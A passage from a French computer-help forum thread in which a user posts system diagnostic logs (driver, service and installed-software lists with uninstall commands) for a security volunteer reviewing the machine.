    R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\ADIHdAud.sys [2007-01-16 293888]
    R3 AEAudio;AE Audio Service; C:\WINDOWS\system32\drivers\AEAudio.sys [2006-08-06 93952]
    R3 Arp1394;Protocole client ARP 1394; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
    R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\drivers\GEARAspiWDM.sys [2008-02-22 16168]
    R3 HDAudBus;Pilote de bus Microsoft UAA pour High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
    R3 hidusb;Pilote de classe HID Microsoft; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
    R3 mouhid;Pilote HID de souris; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-05 12288]
    R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-13 5810]
    R3 NIC1394;Pilote réseau 1394; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
    R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-10-07 6133856]
    R3 usbaudio;Pilote USB audio (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
    R3 usbccgp;Pilote parent générique USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
    R3 usbehci;Pilote miniport de contrôleur d'hôte amélioré Microsoft USB 2.0; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
    R3 usbhub;Concentrateur USB2; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
    R3 usbuhci;Pilote miniport de contrôleur hôte universel USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
    R3 yukonwxp;NDIS5.1 Miniport Driver for Marvell Yukon Ethernet Controller; C:\WINDOWS\system32\DRIVERS\yk51x86.sys [2006-07-26 248832]
    S3 61883;Pilote d'unité 61883; C:\WINDOWS\system32\DRIVERS\61883.sys [2008-04-13 48128]
    S3 a5lrjchr;a5lrjchr; C:\WINDOWS\system32\drivers\a5lrjchr.sys []
    S3 Avc;Périphérique AVC; C:\WINDOWS\system32\DRIVERS\avc.sys [2008-04-13 38912]
    S3 catchme;catchme; \??\C:\ComboFix\catchme.sys []
    S3 CCDECODE;Décodeur sous-titre fermé; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
    S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-03-09 51024]
    S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-03-09 16080]
    S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-03-09 21456]
    S3 MSDV;Microsoft DV Camera and VCR; C:\WINDOWS\system32\DRIVERS\msdv.sys [2008-04-13 51200]
    S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
    S3 NABTSFEC;Codec NABTS/FEC VBI; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
    S3 NdisIP;Connection TV/vidéo Microsoft; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
    S3 nm;Pilote du Moniteur réseau; C:\WINDOWS\system32\DRIVERS\NMnt.sys [2008-04-13 40320]
    S3 nmwcdnsu;Nokia USB Flashing Phone Parent; C:\WINDOWS\system32\drivers\nmwcdnsu.sys [2008-02-01 138112]
    S3 nmwcdnsuc;Nokia USB Flashing Generic; C:\WINDOWS\system32\drivers\nmwcdnsuc.sys [2008-02-01 8320]
    S3 NPF;NetGroup Packet Filter Driver; C:\WINDOWS\system32\drivers\npf.sys [2007-11-06 34064]
    S3 pccsmcfd;PCCS Mode Change Filter Driver; C:\WINDOWS\system32\DRIVERS\pccsmcfd.sys [2008-08-26 18816]
    S3 QCDonner;Logitech QuickCam Express; C:\WINDOWS\system32\DRIVERS\OVCD.sys [2001-08-17 28032]
    S3 SLIP;Détrameur décalage BDA; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
    S3 SONYPVU1;Pilote de filtrage Sony USB (SONYPVU1); C:\WINDOWS\system32\DRIVERS\SONYPVU1.SYS [2001-08-17 7552]
    S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
    S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2008-06-06 8064]
    S3 usbprint;Classe d'imprimantes USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
    S3 usbscan;Pilote de scanneur USB; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
    S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
    S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2008-05-07 8064]
    S3 USBSTOR;Pilote de stockage de masse USB; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
    S3 VX6000;Microsoft LifeCam VX-6000; C:\WINDOWS\system32\DRIVERS\VX6000Xp.sys [2006-06-30 2383152]
    S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2006-11-02 492000]
    S3 WSTCODEC;Codec Teletext standard; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
    S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-15 82688]
    S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
    S4 mchInjDrv;mchInjDrv; \??\C:\DOCUME~1\lml-mike\LOCALS~1\Temp\mc21.tmp []
    
    ======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
    
    R2 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe [2008-09-18 72704]
    R2 avg8wd;AVG8 WatchDog; C:\logs\avg\avgwdsvc.exe [2009-03-17 298264]
    R2 Diskeeper;Diskeeper; C:\Logs\Diskeeper\DkService.exe [2004-10-05 577644]
    R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2008-11-10 152984]
    R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe [2006-10-19 61440]
    R2 mi-raysat_3dsmax8;RaySat_3dsmax8 Server; V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe [2005-09-21 65536]
    R2 MSCamSvc;MSCamSvc; C:\Program Files\Microsoft LifeCam\MSCamSvc.exe [2006-06-30 187184]
    R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-10-07 163908]
    R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 89968]
    R2 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-13 14336]
    R3 NMIndexingService;NMIndexingService; C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe [2006-12-23 262144]
    R3 ServiceLayer;ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [2008-11-11 620544]
    S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-09-18 72704]
    S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2007-04-13 33632]
    S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2007-04-13 68952]
    S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
    S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2005-02-24 73728]
    S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
    S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2); C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
    S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\ODSERV.EXE [2007-08-24 443776]
    S3 ose;Office Source Engine; C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
    S3 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-03-09 65795]
    S3 rpcapd;Remote Packet Capture Protocol v.0 (experimental); C:\Program Files\WinPcap\rpcapd.exe [2007-11-06 92792]
    S3 WMPNetworkSvc;Service Partage réseau du Lecteur Windows Media; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-11-03 918016]
    S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
    S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]
    S4 SQLBrowser;SQL Server Browser; C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]
    
    -----------------EOF-----------------
    
    0
  9. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    dans ton cas, j'ai besoin de c:\rsit\info.txt
    0
  10. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    oops, pardon !

    info.txt logfile of random's system information tool 1.05 2009-03-17 12:42:11
    
    ======Uninstall list======
    
    -->C:\Logs\DivX\DivXConverterUninstall.exe /CONVERTER
    -->C:\Program Files\Nero\Nero 7\nero\uninstall\UNNERO.exe /UNINSTALL
    -->MsiExec /X{E4D15328-8C89-484B-B9AA-F5BE9EA6D01C}
    -->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
    123 AVI to GIF Converter 3.0-->"C:\Logs\123 AVI to GIF Converter\unins000.exe"
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {BEE75E01-DD3F-4D5F-B96C-609E6538D419}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0015-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0016-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0018-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0019-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001A-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001B-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0401-0000-0000000FF1CE} /uninstall {5A2F65A4-808F-4A1E-973E-92E17824982D}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0407-0000-0000000FF1CE} /uninstall {2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0409-0000-0000000FF1CE} /uninstall {3EC77D26-799B-4CD8-914F-C1565E796173}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-040C-0000-0000000FF1CE} /uninstall {430971B1-C31E-45DA-81E0-72C095BAB72C}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0413-0000-0000000FF1CE} /uninstall {B3F4DC34-7F60-4B7C-A79F-1C13012D99D4}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-001F-0C0A-0000-0000000FF1CE} /uninstall {F7A31780-33C4-4E39-951A-5EC9B91D7BF1}
    2007 Microsoft Office Suite Service Pack 1 (SP1)-->msiexec /package {90120000-0044-040C-0000-0000000FF1CE} /uninstall {A0353900-21A2-42CF-B973-883500A027F7}
    ABC (remove only)-->C:\Logs\ABC\Uninstall.exe
    AC3Filter (remove only)-->C:\Logs\AC3Filter\uninstall.exe
    Adobe Bridge 1.0-->MsiExec.exe /I{B74D4E10-6884-0000-0000-000000000101}
    Adobe Common File Installer-->MsiExec.exe /I{8EDBA74D-0686-4C99-BFDD-F894678E5101}
    Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
    Adobe Flash Player ActiveX-->C:\WINDOWS\system32\Macromed\Flash\uninstall_activeX.exe
    Adobe Help Center 1.0-->MsiExec.exe /I{E9787678-119F-4D52-B551-6739B2B22101}
    Adobe Photoshop CS2-->msiexec /I {236BB7C4-4419-42FD-040C-1E257A25E34D}
    Adobe Reader 9 - Français-->MsiExec.exe /I{AC76BA86-7AD7-1036-7B44-A90000000001}
    Adobe Shockwave Player 11-->C:\WINDOWS\system32\adobe\SHOCKW~1\UNWISE.EXE C:\WINDOWS\system32\Adobe\SHOCKW~1\Install.log
    Adobe Stock Photos 1.0-->MsiExec.exe /I{786C5747-0C40-4930-9AFE-113BCE553101}
    Apple Software Update-->MsiExec.exe /I{6956856F-B6B3-4BE0-BA0B-8F495BE32033}
    Archiveur WinRAR-->C:\Logs\WinRAR\uninstall.exe
    ASIO4ALL-->v:\FL Studio 8\ASIO4ALL v2\uninstall.exe
    Assistant de connexion Windows Live-->MsiExec.exe /I{DCE8CD14-FBF5-4464-B9A4-E18E473546C7}
    Audacity 1.2.6-->"C:\Logs\Audacity\unins000.exe"
    Autodesk 3ds Max 8-->MsiExec.exe /I{DBB313D6-4B13-4961-BD5F-673CDA1793CC}
    Autodesk DWF Viewer-->C:\PROGRA~1\Autodesk\AUTODE~1\Setup.exe /remove
    AVG 8.5-->C:\logs\avg\setup.exe /UNINSTALL
    AviSynth 2.5-->"C:\Logs\AviSynth 2.5\Uninstall.exe"
    Backburner-->MsiExec.exe /I{3D347E6D-5A03-4342-B5BA-6A771885F379}
    BluffTitler-->"C:\Logs\BluffTitler\uninstall.exe"
    Boris FX-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{EED27288-EA1A-44E9-913C-648FFC9ADDF0}\Setup.exe" -l0x9 
    Boris Graffiti Ltd-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0701\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{0B5889E0-0C2B-4E68-8A7C-D3A37479A061}\setup.exe" -l0x9 
    CCleaner (remove only)-->"C:\Logs\CCleaner\uninst.exe"
    Choice Guard-->MsiExec.exe /I{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}
    Collab-->C:\Program Files\Image-Line\Collab\uninstall.exe
    ConvertHelper 2.2-->"C:\Logs\ConvertHelper\unins000.exe"
    CoreAAC Audio Decoder (remove only)-->"C:\WINDOWS\system32\CoreAAC-uninstall.exe"
    Correctif pour Lecteur Windows Media 11 (KB939683)-->"C:\WINDOWS\$NtUninstallKB939683$\spuninst\spuninst.exe"
    Correctif pour Windows XP (KB952287)-->"C:\WINDOWS\$NtUninstallKB952287$\spuninst\spuninst.exe"
    Counter-Strike: Source-->"V:\Steam\steam.exe" steam://uninstall/240
    Counter-Strike-->"V:\Steam\steam.exe" steam://uninstall/10
    DeepBurner v1.9.0.228-->"C:\Logs\DeepBurner\Uninstall.exe" "C:\Logs\DeepBurner\install.log" -u
    DEVIL MAY CRY 4-->MsiExec.exe /I{D4E5A687-797D-44B1-8F96-4FD7A24166A9}
    Direct Show Ogg Vorbis Filter (remove only)-->"C:\WINDOWS\system32\OggDSuninst.exe"
    Diskeeper Professional Edition-->MsiExec.exe /I{E87BE7F8-3077-40C1-8592-956F649A2781}
    Disque de souvenirs HP-->MsiExec.exe /X{B376402D-58EA-45EA-BD50-DD924EB67A70}
    DivX Codec 3.1alpha release-->C:\WINDOWS\system32\rundll32.exe setupapi,InstallHinfSection Remove_DivX 132 C:\WINDOWS\INF\DivX.inf
    DivX Codec-->C:\Logs\DivX\DivXCodecUninstall.exe /CODEC
    DivX Converter-->C:\Logs\DivX\DivXConverterUninstall.exe /CONVERTER
    DivX Player-->C:\Logs\DivX\DivXPlayerUninstall.exe /PLAYER
    DivX Web Player-->C:\Program Files\DivX\DivXWebPlayerUninstall.exe /PLUGIN
    DU Meter-->"C:\Logs\DU Meter\unins000.exe"
    eMule-->"V:\eMule\Uninstall.exe"
    Fallout 3-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\11\00\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{974C4B12-4D02-4879-85E0-61C95CC63E9E}\setup.exe" -l0x40c  -removeonly
    ffdshow [rev 1008] [2007-03-08]-->"C:\Logs\ffdshow\unins000.exe"
    Final Fantasy VII-->C:\WINDOWS\IsUn040c.exe -fv:\FF7\Uninst.isu
    FL Studio 8-->v:\FL Studio 8\uninstall.exe
    FlashFXP v3-->C:\Logs\FlashFXP\unins000.exe
    Fraps (remove only)-->"C:\Logs\Fraps\uninstall.exe"
    Free FLV Converter V 6.1.0-->"C:\Logs\Free FLV Converter\unins000.exe"
    GDR 3077 for SQL Server Database Services 2005 ENU (KB960089)-->C:\WINDOWS\SQL9_KB960089_ENU\Hotfix.exe /Uninstall
    GEAR 32bit Driver Installer-->MsiExec.exe /X{E89B484C-B913-49A0-959B-89E836001658}
    Haali Media Splitter-->"C:\Logs\MatroskaSplitter\uninstall.exe"
    HijackThis 2.0.2-->"C:\Program Files\trend micro\HijackThis.exe" /uninstall
    HLSW v1.2.1.2-->"C:\Logs\HLSW\unins000.exe"
    Hotfix for Windows Media Format 11 SDK (KB929399)-->"C:\WINDOWS\$NtUninstallKB929399$\spuninst\spuninst.exe"
    hp psc 1200 series-->rundll32 hpzcon07.dll,VendorJettison hp psc 1200 series
    IL Download Manager-->C:\Program Files\Image-Line\Downloader\uninstall.exe
    Installation Windows Live-->C:\Program Files\Windows Live\Installer\wlarp.exe
    Installation Windows Live-->MsiExec.exe /I{7370DF47-B4F9-4279-BFC3-3F09919F720D}
    Java(TM) 6 Update 11-->MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216010FF}
    Lame ACM MP3 Codec-->C:\WINDOWS\system32\rundll32.exe setupapi,InstallHinfSection Remove_LameMP3 132 C:\WINDOWS\INF\LameACM.inf
    Lecteur Windows Media 11-->"C:\Program Files\Windows Media Player\Setup_wm.exe" /Uninstall
    Magic Bullet Editors Vegas-->C:\WINDOWS\unvise32.exe c:\logs\vegas pro 8.0\video plug-ins\Magic bullet editor 2\Magic Bullet Editors Vegas\mbeditorsvegas.log
    Malwarebytes' Anti-Malware-->"C:\Logs\Malwarebytes' Anti-Malware\unins000.exe"
    Media Player Classic fr-->"C:\Logs\Media Player Classic\uninstall.exe"
    MeGUI modern media encoder (remove only)-->"C:\Logs\megui\megui-uninstall.exe"
    Messenger Plus! Live-->"C:\Logs\Messenger Plus! Live\Uninstall.exe"
    Microsoft .NET Framework 2.0-->C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\install.exe
    Microsoft .NET Framework 3.0-->C:\WINDOWS\Microsoft.NET\Framework\v3.0\Microsoft .NET Framework 3.0\setup.exe
    Microsoft .NET Framework 3.0-->MsiExec.exe /X{15095BF3-A3D7-4DDF-B193-3A496881E003}
    Microsoft Compression Client Pack 1.0 for Windows XP-->"C:\WINDOWS\$NtUninstallMSCompPackV1$\spuninst\spuninst.exe"
    Microsoft Games for Windows - LIVE -->MsiExec.exe /X{4AA3D64E-9EC3-4B0F-AB91-5885AC55641F}
    Microsoft Games for Windows - LIVE Redistributable-->MsiExec.exe /X{FD052FB9-FE90-4438-B355-15EDC89D8FB1}
    Microsoft Internationalized Domain Names Mitigation APIs-->"C:\WINDOWS\$NtServicePackUninstallIDNMitigationAPIs$\spuninst\spuninst.exe"
    Microsoft Kernel-Mode Driver Framework Feature Pack 1.5-->"C:\WINDOWS\$NtUninstallWdf01005$\spuninst\spuninst.exe"
    Microsoft LifeCam-->MsiExec.exe /X{6F5D254A-5869-4B94-BF55-D68938FD1CC6}
    Microsoft National Language Support Downlevel APIs-->"C:\WINDOWS\$NtServicePackUninstallNLSDownlevelMapping$\spuninst\spuninst.exe"
    Microsoft Office Access MUI (French) 2007-->MsiExec.exe /X{90120000-0015-040C-0000-0000000FF1CE}
    Microsoft Office Excel MUI (French) 2007-->MsiExec.exe /X{90120000-0016-040C-0000-0000000FF1CE}
    Microsoft Office InfoPath MUI (French) 2007-->MsiExec.exe /X{90120000-0044-040C-0000-0000000FF1CE}
    Microsoft Office Language Pack 2007 Service Pack 1 (SP1)-->msiexec /package {90120000-006E-040C-0000-0000000FF1CE} /uninstall {EC50B538-CBE1-42E6-B7FE-87AA540AADFB}
    Microsoft Office Outlook MUI (French) 2007-->MsiExec.exe /X{90120000-001A-040C-0000-0000000FF1CE}
    Microsoft Office PowerPoint MUI (French) 2007-->MsiExec.exe /X{90120000-0018-040C-0000-0000000FF1CE}
    Microsoft Office Professional Plus 2007-->"C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\Office Setup Controller\setup.exe" /uninstall PROPLUS /dll OSETUP.DLL
    Microsoft Office Professional Plus 2007-->MsiExec.exe /X{90120000-0011-0000-0000-0000000FF1CE}
    Microsoft Office Proof (Arabic) 2007-->MsiExec.exe /X{90120000-001F-0401-0000-0000000FF1CE}
    Microsoft Office Proof (Dutch) 2007-->MsiExec.exe /X{90120000-001F-0413-0000-0000000FF1CE}
    Microsoft Office Proof (English) 2007-->MsiExec.exe /X{90120000-001F-0409-0000-0000000FF1CE}
    Microsoft Office Proof (French) 2007-->MsiExec.exe /X{90120000-001F-040C-0000-0000000FF1CE}
    Microsoft Office Proof (German) 2007-->MsiExec.exe /X{90120000-001F-0407-0000-0000000FF1CE}
    Microsoft Office Proof (Spanish) 2007-->MsiExec.exe /X{90120000-001F-0C0A-0000-0000000FF1CE}
    Microsoft Office Proofing (French) 2007-->MsiExec.exe /X{90120000-002C-040C-0000-0000000FF1CE}
    Microsoft Office Publisher MUI (French) 2007-->MsiExec.exe /X{90120000-0019-040C-0000-0000000FF1CE}
    Microsoft Office Shared MUI (French) 2007-->MsiExec.exe /X{90120000-006E-040C-0000-0000000FF1CE}
    Microsoft Office Word MUI (French) 2007-->MsiExec.exe /X{90120000-001B-040C-0000-0000000FF1CE}
    Microsoft SQL Server 2005 Express Edition (SONY_MEDIAMGR2)-->MsiExec.exe /I{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}
    Microsoft SQL Server 2005-->"C:\Program Files\Microsoft SQL Server\90\Setup Bootstrap\ARPWrapper.exe" /Remove
    Microsoft SQL Server Native Client-->MsiExec.exe /I{F9B3DD02-B0B3-42E9-8650-030DFF0D133D}
    Microsoft SQL Server Setup Support Files (English)-->MsiExec.exe /X{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}
    Microsoft SQL Server VSS Writer-->MsiExec.exe /I{E9F44C98-B8B6-480F-AF7B-E42A0A46F4E3}
    Microsoft User-Mode Driver Framework Feature Pack 1.5-->"C:\WINDOWS\$NtUninstallWudf01005$\spuninst\spuninst.exe"
    Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{7299052b-02a4-4627-81f2-1818da5d550d}
    Microsoft Visual C++ 2005 Redistributable-->MsiExec.exe /X{A49F249F-0C91-497F-86DF-B2585E8E76B7}
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022-->MsiExec.exe /X{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}
    mIRC-->"C:\WINDOWS\Winend\mirc.exe" -uninstall
    Mirror's Edge™-->MsiExec.exe /X{AEDBD563-24BB-4EE3-8366-A654DAC2D988}
    Mise à jour critique pour Lecteur Windows Media 11 (KB959772)-->"C:\WINDOWS\$NtUninstallKB959772_WM11$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media (KB952069)-->"C:\WINDOWS\$NtUninstallKB952069_WM9$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 11 (KB936782)-->"C:\WINDOWS\$NtUninstallKB936782_WMP11$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Lecteur Windows Media 11 (KB954154)-->"C:\WINDOWS\$NtUninstallKB954154_WM11$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB938127-v2)-->"C:\WINDOWS\ie7updates\KB938127-v2-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB950759)-->"C:\WINDOWS\ie7updates\KB950759-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB953838)-->"C:\WINDOWS\ie7updates\KB953838-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB956390)-->"C:\WINDOWS\ie7updates\KB956390-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB958215)-->"C:\WINDOWS\ie7updates\KB958215-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB960714)-->"C:\WINDOWS\ie7updates\KB960714-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows Internet Explorer 7 (KB961260)-->"C:\WINDOWS\ie7updates\KB961260-IE7\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB923689)-->"C:\WINDOWS\$NtUninstallKB923689$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB938464)-->"C:\WINDOWS\$NtUninstallKB938464$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB941569)-->"C:\WINDOWS\$NtUninstallKB941569$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB946648)-->"C:\WINDOWS\$NtUninstallKB946648$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950760)-->"C:\WINDOWS\$NtUninstallKB950760$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950762)-->"C:\WINDOWS\$NtUninstallKB950762$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB950974)-->"C:\WINDOWS\$NtUninstallKB950974$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951066)-->"C:\WINDOWS\$NtUninstallKB951066$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951376-v2)-->"C:\WINDOWS\$NtUninstallKB951376-v2$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951698)-->"C:\WINDOWS\$NtUninstallKB951698$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB951748)-->"C:\WINDOWS\$NtUninstallKB951748$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB952954)-->"C:\WINDOWS\$NtUninstallKB952954$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB953839)-->"C:\WINDOWS\$NtUninstallKB953839$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954211)-->"C:\WINDOWS\$NtUninstallKB954211$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954459)-->"C:\WINDOWS\$NtUninstallKB954459$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB954600)-->"C:\WINDOWS\$NtUninstallKB954600$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB955069)-->"C:\WINDOWS\$NtUninstallKB955069$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956391)-->"C:\WINDOWS\$NtUninstallKB956391$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956802)-->"C:\WINDOWS\$NtUninstallKB956802$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB956803)-->"C:\WINDOWS\$NtUninstallKB956803$\spuninst\spuninst.exe"
